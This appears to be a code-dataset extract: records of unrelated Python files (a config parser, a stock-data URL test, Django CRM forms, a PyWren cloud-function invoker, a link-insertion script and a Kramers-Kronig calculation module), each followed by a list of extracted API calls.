# so that they may be easy to spot in a configuration file.
def _eval_condition(cond, ARG, CFG, line_num, fname):
"""Evaluates a string using the eval function. It prints a
warning if there are any errors. Returns the result of the
evaluation and an error number: 0 if everything is fine, 1 if
there was an error. """
ARG.FILEPATH = '%s/%s/%s' % (ARG.cfg, CFG['xcpp']['path'], ARG.inputfile)
try:
# pylint: disable=eval-used
# To be able to evaluate a condition without creating a whole
# new parser we can use the eval function. We could have use
# a python file as a configuration but then there would be
# no simple structure to the files.
cond = eval(cond)
enum = 0
# pylint: disable=broad-except
# Anything can go wrong during the execution of the `eval`
# function. For this reason we must try to catch anything that
# may come our way so that we may give out a warning message
# and ignore it.
except Exception as exception:
cond = None
enum = 1
trace(
'WARNING: error in line %d of %r: %s\n' % (
line_num, fname, exception.message
)
)
return cond, enum
def _read_config(fname, arg):
"""Simple parser to read configuration files. """
data = OrderedDict()
sec = None
line_num = 0
with open(fname, 'r') as fhandle:
for line in fhandle:
line_num += 1
if line[0] == '[':
sec = line[1:-2]
data[sec] = OrderedDict()
elif '=' in line:
tmp = line.split('=', 1)
key = tmp[0].strip()
val = tmp[1].strip()
val = os.path.expandvars(val)
replacements = _get_replacements(
RE.findall(val), data, sec
)
# pylint: disable=star-args
if replacements:
val = replace(val, *replacements)
match = RE_IFELSE.match(val)
if match:
cond, enum = _eval_condition(
match.group('cond'), arg, data, line_num, fname
)
if enum == 1:
continue
groups = match.groups()
val = groups[0] if cond else groups[2]
else:
match = RE_IF.match(val)
if match:
cond, enum = _eval_condition(
match.group('cond'), arg, data, line_num, fname
)
if enum == 1:
continue
if cond:
val = match.group('iftrue')
else:
continue
data[sec][key] = val
return data
def read_config(arg):
"""Read the configuration file xcpp.config"""
path = arg.cfg
if path == '.' and not os.path.exists('xcpp.config'):
if 'XCPP_CONFIG_PATH' in os.environ:
tmp_path = os.environ['XCPP_CONFIG_PATH']
if os.path.exists('%s/xcpp.config' % tmp_path):
trace("Configured with: '%s/xcpp.config'\n" % tmp_path)
path = tmp_path
elif not os.path.exists('%s/xcpp.config' % path):
error("ERROR: %s/xcpp.config does not exist\n" % path)
arg.cfg = path
try:
config = _read_config('%s/xcpp.config' % path, arg)
except IOError:
config = OrderedDict()
return config
def run(arg):
"""Run command. """
config = read_config(arg)
if arg.v:
disp('path to xcpp.config: "%s"\n' % arg.cfg)
if arg.var is None:
for sec in config:
disp('[%s]\n' % sec)
for key in config[sec]:
disp(' %s = %s\n' % (key, config[sec][key]))
disp('\n')
return
try:
command, var = arg.var.split('.', 1)
except ValueError:
error("ERROR: '%s' is not of the form sec.key\n" % arg.var)
try:
disp(config[command][var]+'\n')
except KeyError:
pass
return
def _update_single(cfg, name, defaults=None):
"Helper function for get_cfg."
if defaults:
for var, val in defaults.iteritems():
cfg[name][var] = os.path.expandvars(str(val))
else:
mod = import_mod('excentury.command.%s' % name)
if hasattr(mod, "DEFAULTS"):
for var, val in mod.DEFAULTS.iteritems():
cfg[name][var] = os.path.expandvars(val)
def _update_from_file(cfg, name, cfg_file):
"Helper function for get_cfg."
if name in cfg_file:
for var, val in cfg_file[name].iteritems():
cfg[name][var] = os.path.expandvars(val)
def _update_from_arg(cfg, argdict, key):
"Helper function for get_cfg."
for var in cfg[key]:
if var in argdict and argdict[var] is not None:
cfg[key][var] = argdict[var]
def get_cfg(arg, names, defaults=None):
"""Obtain the settings for a command. """
cfg = {
'xcpp': {
'root': '.',
'path': '.'
}
}
cfg_file = read_config(arg)
if 'xcpp' in cfg_file:
for var, val in cfg_file['xcpp'].iteritems():
cfg['xcpp'][var] = os.path.expandvars(val)
cfg['xcpp']['root'] = arg.cfg
if isinstance(names, list):
for name in names:
cfg[name] = dict()
_update_single(cfg, name)
_update_from_file(cfg, name, cfg_file)
else:
if names != 'xcpp':
cfg[names] = dict()
_update_single(cfg, names, defaults)
_update_from_file(cfg, names, cfg_file)
argdict = vars(arg)
if arg.parser_name in cfg:
_update_from_arg(cfg, argdict, arg.parser_name)
elif arg.parser_name == 'to' and arg.lang in cfg:
_update_from_arg(cfg, argdict, arg.lang)
_update_from_arg(cfg, argdict, 'xcpp')
return cfg
| [((27, 5, 27, 36), 're.compile', 're.compile', ({(27, 16, 27, 35): '"""\\\\${(?P<key>.*?)}"""'}, {}), "('\\\\${(?P<key>.*?)}')", False, 'import re\n'), ((28, 8, 30, 1), 're.compile', 're.compile', ({(29, 4, 29, 46): '"""(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]"""'}, {}), "('(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]')", False, 'import re\n'), ((31, 12, 33, 1), 're.compile', 're.compile', ({(32, 4, 32, 66): '"""(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]ELSE (?P<iffalse>.*)"""'}, {}), "('(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]ELSE (?P<iffalse>.*)')", False, 'import re\n'), ((39, 4, 39, 25), 'sys.stdout.write', 'sys.stdout.write', ({(39, 21, 39, 24): 'msg'}, {}), '(msg)', False, 'import sys\n'), ((153, 11, 153, 24), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((246, 14, 246, 55), 'excentury.command.import_mod', 'import_mod', ({(246, 25, 246, 54): "'excentury.command.%s' % name"}, {}), "('excentury.command.%s' % name)", False, 'from excentury.command import error, trace, import_mod\n'), ((84, 39, 84, 60), 'textwrap.dedent', 'textwrap.dedent', ({(84, 55, 84, 59): 'DESC'}, {}), '(DESC)', False, 'import textwrap\n'), ((143, 8, 147, 9), 'excentury.command.trace', 'trace', ({(144, 12, 146, 13): "('WARNING: error in line %d of %r: %s\\n' % (line_num, fname, exception.message)\n )"}, {}), "('WARNING: error in line %d of %r: %s\\n' % (line_num, fname, exception\n .message))", False, 'from excentury.command import error, trace, import_mod\n'), ((201, 27, 201, 56), 'os.path.exists', 'os.path.exists', ({(201, 42, 201, 55): '"""xcpp.config"""'}, {}), "('xcpp.config')", False, 'import os\n'), ((204, 15, 204, 58), 'os.path.exists', 'os.path.exists', ({(204, 30, 204, 57): "('%s/xcpp.config' % tmp_path)"}, {}), "('%s/xcpp.config' % tmp_path)", False, 'import os\n'), ((207, 13, 207, 52), 'os.path.exists', 'os.path.exists', ({(207, 28, 207, 51): "('%s/xcpp.config' % path)"}, {}), "('%s/xcpp.config' % path)", False, 'import os\n'), ((208, 8, 208, 62), 'excentury.command.error', 'error', ({(208, 14, 208, 61): "('ERROR: %s/xcpp.config does not exist\\n' % path)"}, {}), "('ERROR: %s/xcpp.config does not exist\\n' % path)", False, 'from excentury.command import error, trace, import_mod\n'), ((213, 17, 213, 30), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((232, 8, 232, 67), 'excentury.command.error', 'error', ({(232, 14, 232, 66): '("ERROR: \'%s\' is not of the form sec.key\\n" % arg.var)'}, {}), '("ERROR: \'%s\' is not of the form sec.key\\n" % arg.var)', False, 'from excentury.command import error, trace, import_mod\n'), ((256, 29, 256, 52), 'os.path.expandvars', 'os.path.expandvars', ({(256, 48, 256, 51): 'val'}, {}), '(val)', False, 'import os\n'), ((277, 31, 277, 54), 'os.path.expandvars', 'os.path.expandvars', ({(277, 50, 277, 53): 'val'}, {}), '(val)', False, 'import os\n'), ((49, 35, 49, 47), 're.escape', 're.escape', ({(49, 45, 49, 46): 'k'}, {}), '(k)', False, 'import re\n'), ((161, 28, 161, 41), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((205, 16, 205, 71), 'excentury.command.trace', 'trace', ({(205, 22, 205, 70): '("Configured with: \'%s/xcpp.config\'\\n" % tmp_path)'}, {}), '("Configured with: \'%s/xcpp.config\'\\n" % tmp_path)', False, 'from excentury.command import error, trace, import_mod\n'), ((249, 33, 249, 56), 'os.path.expandvars', 'os.path.expandvars', ({(249, 52, 249, 55): 'val'}, {}), '(val)', False, 'import os\n'), ((166, 22, 166, 45), 'os.path.expandvars', 'os.path.expandvars', ({(166, 41, 166, 44): 'val'}, {}), '(val)', False, 'import os\n')] |
pkjmesra/nseta | tests/test_urls.py | 28cd8cede465efe9f506a38c5933602c463e5185 | # -*- coding: utf-8 -*-
'''
Created on Thu Nov 19 20:52:33 2015
@author: SW274998
'''
from nseta.common.commons import *
import datetime
import unittest
import time
from bs4 import BeautifulSoup
from tests import htmls
import json
import requests
import six
from nseta.common.urls import *
import nseta.common.urls as urls
from six.moves.urllib.parse import urlparse
from baseUnitTest import baseUnitTest
class TestUrls(baseUnitTest):
def setUp(self, redirect_logs=True):
super().setUp()
proxy_on = False
if proxy_on:
urls.session.proxies.update({'http': 'proxy1.wipro.com:8080'})
def runTest(self):
for key in TestUrls.__dict__.keys():
if key.find('test') == 0:
TestUrls.__dict__[key](self)
def test_get_symbol_count(self):
count = get_symbol_count(symbol='SBIN')
self.assertEqual(count, '1')
force_count = get_symbol_count(symbol='SBIN', force_refresh=True)
self.assertEqual(force_count, '1')
def test_equity_history_url(self):
sym_count = get_symbol_count(symbol='SBIN')
txt = 'Data for SBIN - EQ'
resp = equity_history_url(symbol='SBIN',
symbolCount=sym_count,
series='EQ',
fromDate='01-01-2000',
toDate='10-01-2000',
dateRange='')
self.assertGreaterEqual(resp.text.find(txt), 0, resp.text)
def test_nse_intraday_url(self):
txt = 'date|g1_o|g1_h|g1_l|g1_c|g2|g2_CUMVOL' #'<columns><column>date</column><column>pltp</column><column>nltp</column><column>previousclose</column><column>allltp</column>'
resp = nse_intraday_url(CDSymbol='SBIN', Periodicity='1')
self.assertIn(txt, resp.text)
def test_price_list_url(self):
resp = price_list_url('2019', 'DEC', '31DEC2019')
csv = unzip_str(resp.content)
self.assertGreaterEqual(csv.find('SBIN'), 0)
def tests_daily_volatility_url(self):
resp = daily_volatility_url('19112015')
self.assertGreaterEqual(resp.text.find('SBIN'), 0)
def test_pr_price_list_zipped_url(self):
resp = pr_price_list_zipped_url('191115')
csv = unzip_str(resp.content)
def test_index_history_url(self):
resp = index_history_url(indexType='NIFTY 50',
fromDate='01-01-2015',
toDate='10-01-2015')
self.assertGreaterEqual(resp.text.find('High'), 0)
self.assertGreaterEqual(resp.text.find('Low'), 0)
def test_index_daily_snapshot_url(self):
resp = index_daily_snapshot_url('06012020')
csv = str(resp.content)
self.assertGreaterEqual(csv.find('Nifty 50'), 0)
self.assertGreaterEqual(csv.find('Nifty IT'), 0)
self.assertGreaterEqual(csv.find('Nifty Bank'), 0)
self.assertGreaterEqual(csv.find('Nifty Next 50'), 0)
def test_index_pe_history_url(self):
resp = index_pe_history_url(fromDate='01-01-2015',
toDate='10-01-2015',
indexName='NIFTY 50')
self.assertGreaterEqual(resp.text.find('<th>P/E'), 0)
self.assertGreaterEqual(resp.text.find('<th>P/B'), 0)
def test_index_vix_history_url(self):
resp = index_vix_history_url(fromDate='01-Jan-2015',
toDate='10-Jan-2015',
)
self.assertGreaterEqual(resp.text.find('VIX'), 0)
self.assertGreaterEqual(resp.text.find('Change'), 0)
def test_derivative_derivative_expiry_dates_url(self):
resp = derivative_expiry_dates_url()
self.assertGreaterEqual(resp.text.find('vixExpryDt'), 0)
def test_derivative_history_url(self):
resp = derivative_history_url(instrumentType='FUTIDX',
symbol='NIFTY',
expiryDate='26-12-2019',
optionType='select',
strikePrice='',
dateRange='',
fromDate='25-Dec-2019',
toDate='26-Dec-2019')
self.assertGreaterEqual(resp.text.find('NIFTY'), 0)
self.assertGreaterEqual(resp.text.find('Expiry'), 0)
def test_derivative_price_list_url(self):
resp = derivative_price_list_url('2019', 'JUL', '19JUL2019')
csv = unzip_str(resp.content)
def tearDown(self):
super().tearDown()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestUrls)
result = unittest.TextTestRunner(verbosity=2).run(suite)
if six.PY2:
if result.wasSuccessful():
print('tests OK')
for (test, error) in result.errors:
print('=========Error in: %s===========' % test)
print(error)
print('======================================')
for (test, failures) in result.failures:
print('=========Error in: %s===========' % test)
print(failures)
print('======================================')
| [((27, 6, 27, 68), 'nseta.common.urls.session.proxies.update', 'urls.session.proxies.update', ({(27, 34, 27, 67): "{'http': 'proxy1.wipro.com:8080'}"}, {}), "({'http': 'proxy1.wipro.com:8080'})", True, 'import nseta.common.urls as urls\n'), ((123, 10, 123, 31), 'unittest.TestLoader', 'unittest.TestLoader', ({}, {}), '()', False, 'import unittest\n'), ((124, 11, 124, 47), 'unittest.TextTestRunner', 'unittest.TextTestRunner', (), '', False, 'import unittest\n')] |
cheradenine/Django-CRM | accounts/forms.py | 692572ced050d314c1f880af8b4000c97cbf7440 | from django import forms
from .models import Account
from common.models import Comment, Attachments
from leads.models import Lead
from contacts.models import Contact
from django.db.models import Q
class AccountForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
account_view = kwargs.pop('account', False)
request_user = kwargs.pop('request_user', None)
super(AccountForm, self).__init__(*args, **kwargs)
for field in self.fields.values():
field.widget.attrs = {"class": "form-control"}
self.fields['description'].widget.attrs.update({'rows': '8'})
self.fields['status'].choices = [
(each[0], each[1]) for each in Account.ACCOUNT_STATUS_CHOICE]
self.fields['status'].required = False
for key, value in self.fields.items():
if key == 'phone':
value.widget.attrs['placeholder'] = "+91-123-456-7890"
else:
value.widget.attrs['placeholder'] = value.label
self.fields['billing_address_line'].widget.attrs.update({
'placeholder': 'Address Line'})
self.fields['billing_street'].widget.attrs.update({
'placeholder': 'Street'})
self.fields['billing_city'].widget.attrs.update({
'placeholder': 'City'})
self.fields['billing_state'].widget.attrs.update({
'placeholder': 'State'})
self.fields['billing_postcode'].widget.attrs.update({
'placeholder': 'Postcode'})
self.fields["billing_country"].choices = [
("", "--Country--"), ] + list(self.fields["billing_country"].choices)[1:]
self.fields["lead"].queryset = Lead.objects.all(
).exclude(status='closed')
if request_user:
self.fields["lead"].queryset = Lead.objects.filter(
Q(assigned_to__in=[request_user]) | Q(created_by=request_user)).exclude(status='closed')
self.fields["contacts"].queryset = Contact.objects.filter(
Q(assigned_to__in=[request_user]) | Q(created_by=request_user))
if account_view:
self.fields['billing_address_line'].required = True
self.fields['billing_street'].required = True
self.fields['billing_city'].required = True
self.fields['billing_state'].required = True
self.fields['billing_postcode'].required = True
self.fields['billing_country'].required = True
class Meta:
model = Account
fields = ('name', 'phone', 'email', 'website', 'industry',
'description', 'status',
'billing_address_line', 'billing_street',
'billing_city', 'billing_state',
'billing_postcode', 'billing_country', 'lead', 'contacts')
class AccountCommentForm(forms.ModelForm):
comment = forms.CharField(max_length=64, required=True)
class Meta:
model = Comment
fields = ('comment', 'account', 'commented_by')
class AccountAttachmentForm(forms.ModelForm):
attachment = forms.FileField(max_length=1001, required=True)
class Meta:
model = Attachments
fields = ('attachment', 'account')
| [((65, 14, 65, 59), 'django.forms.CharField', 'forms.CharField', (), '', False, 'from django import forms\n'), ((73, 17, 73, 64), 'django.forms.FileField', 'forms.FileField', (), '', False, 'from django import forms\n'), ((39, 39, 40, 9), 'leads.models.Lead.objects.all', 'Lead.objects.all', ({}, {}), '()', False, 'from leads.models import Lead\n'), ((45, 16, 45, 49), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((45, 52, 45, 78), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((43, 16, 43, 49), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((43, 52, 43, 78), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n')] |
thetolga/pywren-ibm-cloud | pywren/pywren_ibm_cloud/invokers.py | ce48c158cf469b55100ab68a75d3dcd6ae9a3ffe | #
# Copyright 2018 PyWren Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import logging
import random
from pywren_ibm_cloud.cf_connector import CloudFunctions
logger = logging.getLogger(__name__)
class IBMCloudFunctionsInvoker:
def __init__(self, cf_config, retry_config):
self.namespace = cf_config['namespace']
self.endpoint = cf_config['endpoint']
self.cf_action_name = cf_config['action_name'] # Runtime
self.invocation_retry = retry_config['invocation_retry']
self.retry_sleeps = retry_config['retry_sleeps']
self.retries = retry_config['retries']
self.client = CloudFunctions(cf_config)
log_msg = 'IBM Cloud Functions init for {}'.format(self.cf_action_name)
logger.info(log_msg)
if(logger.getEffectiveLevel() == logging.WARNING):
print(log_msg)
def invoke(self, payload):
"""
Invoke -- return information about this invocation
"""
act_id = self.client.invoke(self.cf_action_name, payload)
attempts = 1
while not act_id and self.invocation_retry and attempts < self.retries:
attempts += 1
selected_sleep = random.choice(self.retry_sleeps)
exec_id = payload['executor_id']
call_id = payload['call_id']
log_msg = ('Executor ID {} Function {} - Invocation failed - retry {} in {} seconds'.format(exec_id, call_id, attempts, selected_sleep))
logger.debug(log_msg)
time.sleep(selected_sleep)
act_id = self.client.invoke(self.cf_action_name, payload)
return act_id
def config(self):
"""
Return config dict
"""
return {'cf_action_name': self.cf_action_name,
'cf_namespace': self.namespace,
'cf_endpoint': self.endpoint}
| [((22, 9, 22, 36), 'logging.getLogger', 'logging.getLogger', ({(22, 27, 22, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((34, 22, 34, 47), 'pywren_ibm_cloud.cf_connector.CloudFunctions', 'CloudFunctions', ({(34, 37, 34, 46): 'cf_config'}, {}), '(cf_config)', False, 'from pywren_ibm_cloud.cf_connector import CloudFunctions\n'), ((50, 29, 50, 61), 'random.choice', 'random.choice', ({(50, 43, 50, 60): 'self.retry_sleeps'}, {}), '(self.retry_sleeps)', False, 'import random\n'), ((57, 12, 57, 38), 'time.sleep', 'time.sleep', ({(57, 23, 57, 37): 'selected_sleep'}, {}), '(selected_sleep)', False, 'import time\n')] |
Arugakente/DataScienceP1 | Projet1/Dataset/addlinkRealExample.py | 94ca874ed8a76a89a3da9ecf2fe6e554700f0507 | import os
import random
inputDirectory = "./original"
outputDirectory = "./processed"
#probability parameters
TopLevel = 0.6
SecondLevel = 0.5
ThirdLevel = 0.4
FourAndAbove = 0.2
pickInside = 0.5
pickOutside = 0.25
topics = []
siteLevel = []
fileStructure = []
count = 0
def findPossibleIndex(toParse):
toReturn = []
for current in range(0,len(toParse)):
if toParse[current] == " ":
toReturn.append(current)
toReturn.append(len(toParse))
return toReturn
def manageFile(inputPath,outputPath,topicIndex,currentLevel,filename):
count = 0
content = open(inputPath , 'r')
output = open(outputPath ,"w")
currentLine = content.readline()
outputFile = ""
while currentLine:
currentLine = content.readline()
randomPick = random.uniform(0.0,2.0)
if randomPick <= pickInside+pickOutside :
possibleIndexes = findPossibleIndex(currentLine)
insertPosition = possibleIndexes[random.randint(0,len(possibleIndexes)-1)]
selectedTopic = topicIndex
if(randomPick<=pickOutside):
while(selectedTopic == topicIndex):
selectedTopic = random.randint(0,len(topics)-1)
randomPick = random.uniform(0.0,4.0)
if(randomPick <= TopLevel + SecondLevel + ThirdLevel + FourAndAbove):
selectedLevel = 0
if(randomPick <= TopLevel):
selectedLevel = 1
if(randomPick <= TopLevel+ SecondLevel and randomPick > TopLevel):
selectedLevel = 2
if(randomPick <= TopLevel + SecondLevel + ThirdLevel and randomPick > TopLevel+ SecondLevel):
selectedLevel = 3
if(randomPick <= TopLevel + SecondLevel + ThirdLevel + FourAndAbove and randomPick > TopLevel + SecondLevel + ThirdLevel):
if(len(siteLevel[selectedTopic]) == 4):
selectedLevel = 4
else:
selectedLevel = random.randint(4,len(siteLevel[selectedTopic]))
i = 0
found = False
while i<len(siteLevel[selectedTopic]):
if siteLevel[selectedTopic][i] == str(selectedLevel)+"grade":
found = True
selectedLevel = i
i+=1
if(selectedLevel>=currentLevel):
fileLink = filename
while(fileLink == filename):
fileLink = fileStructure[selectedTopic][selectedLevel][random.randint(0,len(fileStructure[selectedTopic][selectedLevel])-1)]
fileLink = " linkTo:"+fileLink
count += 1
print(count)
if insertPosition == len(currentLine):
currentLine += fileLink
else:
currentLine = currentLine[0:insertPosition]+fileLink+currentLine[insertPosition:]
outputFile += currentLine
output.write(outputFile)
return count
topicIndex=0
for foldername in os.listdir(inputDirectory) :
if(foldername[0] != "."):
topics.append(foldername)
siteLevel.append([])
fileStructure.append([])
levelIndex=0
for categoryName in os.listdir(inputDirectory+"/"+foldername):
if(categoryName[0] != "."):
siteLevel[topicIndex].append(categoryName)
fileStructure[topicIndex].append([])
for filename in os.listdir(inputDirectory+"/"+foldername+"/"+categoryName):
if(filename[0] != "."):
fileStructure[topicIndex][levelIndex].append(filename)
levelIndex += 1
topicIndex += 1
for i in range(0,len(topics)):
for j in range(0,len(siteLevel[i])):
for k in range(0,len(fileStructure[i][j])):
count += manageFile(inputDirectory+"/"+topics[i]+"/"+siteLevel[i][j]+"/"+fileStructure[i][j][k],outputDirectory+"/"+fileStructure[i][j][k],i,j,fileStructure[i][j][k])
print(str(count)+" liens créés") | [((94, 18, 94, 44), 'os.listdir', 'os.listdir', ({(94, 29, 94, 43): 'inputDirectory'}, {}), '(inputDirectory)', False, 'import os\n'), ((41, 21, 41, 44), 'random.uniform', 'random.uniform', ({(41, 36, 41, 39): '0.0', (41, 40, 41, 43): '2.0'}, {}), '(0.0, 2.0)', False, 'import random\n'), ((104, 28, 104, 69), 'os.listdir', 'os.listdir', ({(104, 39, 104, 68): "(inputDirectory + '/' + foldername)"}, {}), "(inputDirectory + '/' + foldername)", False, 'import os\n'), ((52, 25, 52, 48), 'random.uniform', 'random.uniform', ({(52, 40, 52, 43): '0.0', (52, 44, 52, 47): '4.0'}, {}), '(0.0, 4.0)', False, 'import random\n'), ((110, 32, 110, 90), 'os.listdir', 'os.listdir', ({(110, 43, 110, 89): "(inputDirectory + '/' + foldername + '/' + categoryName)"}, {}), "(inputDirectory + '/' + foldername + '/' + categoryName)", False, 'import os\n')] |
benajamin/kkcalc | kkcalc/kk.py | fcabfba288442dd297e3bd9910062c5db2231a91 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Kramers-Kronig Calculator software package.
#
# Copyright (c) 2013 Benjamin Watts, Daniel J. Lauk
#
# The software is licensed under the terms of the zlib/libpng license.
# For details see LICENSE.txt
"""This module implements the Kramers-Kronig transformation."""
import logging, sys
logger = logging.getLogger(__name__)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
logging.StreamHandler(stream=sys.stdout)
import math
import numpy
import os
import data
def calc_relativistic_correction(stoichiometry):
"""Calculate the relativistic correction to the Kramers-Kronig transform.
Parameters:
-----------
stoichiometry : array of integer/float pairs
Each pair in the list consists of an atomic number and the relative proportion of that element.
Returns
-------
This function returns a ``float`` holding the relativistic
corection to the Kramers-Kronig transform.
"""
correction = 0
for z, n in stoichiometry:
correction += (z - (z/82.5)**2.37) * n
return correction
def KK_General_PP(Eval_Energy, Energy, imaginary_spectrum, orders, relativistic_correction):
"""Calculate Kramers-Kronig transform with "Piecewise Polynomial"
algorithm plus the Biggs and Lighthill extended data.
Parameters
----------
Eval_Energy : numpy vector of `float`
Set of photon energies describing points at which to evaluate the real spectrum
Energy : numpy vector of `float`
Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid
imaginary_spectrum : two-dimensional `numpy.array` of `float`
The array consists of columns of polynomial coefficients belonging to the power terms indicated by 'order'
orders : numpy vector of integers
The vector represents the polynomial indices corresponding to the columns of imaginary_spectrum
relativistic_correction : float
The relativistic correction to the Kramers-Kronig transform.
You can calculate the value using the `calc_relativistic_correction` function.
Returns
-------
This function returns the real part of the scattering factors evaluated at photon energies specified by Eval_Energy.
"""
logger = logging.getLogger(__name__)
logger.info("Calculate Kramers-Kronig transform using general piecewise-polynomial algorithm")
# Need to build x-E-n arrays
X = numpy.tile(Energy[:,numpy.newaxis,numpy.newaxis],(1,len(Eval_Energy),len(orders)))
E = numpy.tile(Eval_Energy[numpy.newaxis,:,numpy.newaxis],(len(Energy)-1,1,len(orders)))
C = numpy.tile(imaginary_spectrum[:,numpy.newaxis,:],(1,len(Eval_Energy),1))
N = numpy.tile(orders[numpy.newaxis,numpy.newaxis,:],(len(Energy)-1,len(Eval_Energy),1))
poles = numpy.equal(X,numpy.tile(Eval_Energy[numpy.newaxis,:,numpy.newaxis],(len(Energy),1,len(orders))))
# all N, ln(x+E) and ln(x-E) terms and poles
Integral = numpy.sum(-C*(-E)**N*numpy.log(numpy.absolute((X[1:,:,:]+E)/(X[:-1,:,:]+E)))-C*E**N*(1-poles[1:,:,:])*numpy.log(numpy.absolute((X[1:,:,:]-E+poles[1:,:,:])/((1-poles[:-1,:,:])*X[:-1,:,:]+poles[:-1,:,:]*X[[0]+list(range(len(Energy)-2)),:,:]-E))),axis=(0,2))
if numpy.any(orders<=-2): # N<=-2, ln(x) terms
i = [slice(None,None,None),slice(None,None,None),orders<=-2]
Integral += numpy.sum(C[i]*((-E[i])**N[i]+E[i]**N[i])*numpy.log(numpy.absolute((X[1:,:,orders<=-2])/(X[:-1,:,orders<=-2]))),axis=(0,2))
if numpy.any(orders>=0): # N>=0, x^k terms
for ni in numpy.where(orders>=0)[0]:
i = [slice(None,None,None),slice(None,None,None),ni]
n = orders[ni]
for k in range(n,0,-2):
Integral += numpy.sum(C[i]/float(-k)*2*E[i]**(n-k)*(X[1:,:,ni]**k-X[:-1,:,ni]**k),axis=0)
if numpy.any(orders <=-3): # N<=-3, x^k terms
for ni in numpy.where(orders<=-3)[0]:
i = [slice(None,None,None),slice(None,None,None),ni]
n = orders[ni]
for k in range(n+2,0,2):
Integral += numpy.sum(C[i]/float(k)*((-1)**(n-k)+1)*E[i]**(n-k)*(X[1:,:,ni]**k-X[:-1,:,ni]**k),axis=0)
logger.debug("Done!")
return Integral / math.pi + relativistic_correction
def KK_PP(Eval_Energy, Energy, imaginary_spectrum, relativistic_correction):
"""Calculate Kramers-Kronig transform with "Piecewise Polynomial"
algorithm plus the Biggs and Lighthill extended data.
Parameters
----------
Eval_Energy : numpy vector of `float`
Set of photon energies describing points at which to evaluate the real spectrum
Energy : numpy vector of `float`
Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid
imaginary_spectrum : two-dimensional `numpy.array` of `float`
The array consists of five columns of polynomial coefficients: A_1, A_0, A_-1, A_-2, A_-3
relativistic_correction : float
The relativistic correction to the Kramers-Kronig transform.
You can calculate the value using the `calc_relativistic_correction` function.
Returns
-------
This function returns the real part of the scattering factors evaluated at photon energies specified by Eval_Energy.
"""
logger = logging.getLogger(__name__)
logger.info("Calculate Kramers-Kronig transform using (n from 1 to -3) piecewise-polynomial algorithm")
X1 = Energy[0:-1]
X2 = Energy[1:]
E = numpy.tile(Eval_Energy, (len(Energy)-1, 1)).T
Full_coeffs = imaginary_spectrum.T
Symb_1 = (( Full_coeffs[0, :]*E+Full_coeffs[1, :])*(X2-X1)+0.5*Full_coeffs[0, :]*(X2**2-X1**2)-(Full_coeffs[3, :]/E+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute(X2/X1))+Full_coeffs[4, :]/E*(X2**-1-X1**-1))
Symb_2 = ((-Full_coeffs[0, :]*E+Full_coeffs[1, :])*(X2-X1)+0.5*Full_coeffs[0, :]*(X2**2-X1**2)+(Full_coeffs[3, :]/E-Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute(X2/X1))-Full_coeffs[4, :]/E*(X2**-1-X1**-1))+(Full_coeffs[0, :]*E**2-Full_coeffs[1, :]*E+Full_coeffs[2, :]-Full_coeffs[3, :]*E**-1+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute((X2+E)/(X1+E)))
Symb_3 = (1-1*((X2==E)|(X1==E)))*(Full_coeffs[0, :]*E**2+Full_coeffs[1, :]*E+Full_coeffs[2, :]+Full_coeffs[3, :]*E**-1+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute((X2-E+1*(X2==E))/(X1-E+1*(X1==E))))
Symb_B = numpy.sum(Symb_2 - Symb_1 - Symb_3, axis=1) # Sum areas for approximate integral
# Patch singularities
hits = Energy[1:-1]==E[:,0:-1]
E_hits = numpy.append(numpy.insert(numpy.any(hits, axis=0),[0,0],False),[False,False])
Eval_hits = numpy.any(hits, axis=1)
X1 = Energy[E_hits[2:]]
XE = Energy[E_hits[1:-1]]
X2 = Energy[E_hits[:-2]]
C1 = Full_coeffs[:, E_hits[2:-1]]
C2 = Full_coeffs[:, E_hits[1:-2]]
Symb_singularities = numpy.zeros(len(Eval_Energy))
Symb_singularities[Eval_hits] = (C2[0, :]*XE**2+C2[1, :]*XE+C2[2, :]+C2[3, :]*XE**-1+C2[4, :]*XE**-2)*numpy.log(numpy.absolute((X2-XE)/(X1-XE)))
# Finish things off
KK_Re = (Symb_B-Symb_singularities) / (math.pi*Eval_Energy) + relativistic_correction
logger.debug("Done!")
return KK_Re
def improve_accuracy(Full_E, Real_Spectrum, Imaginary_Spectrum, relativistic_correction, tolerance, recursion=50):
"""Calculate extra data points so that a linear interpolation is more accurate.
Parameters
----------
Full_E : numpy vector of `float`
Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid
Real_Spectrum : numpy vector of `float`
The real part of the spectrum corresponding to magnitudes at photon energies in Full_E
Imaginary_Spectrum : two-dimensional `numpy.array` of `float`
The array consists of five columns of polynomial coefficients: A_1, A_0, A_-1, A_-2, A_-3
relativistic_correction : float
The relativistic correction to the Kramers-Kronig transform.
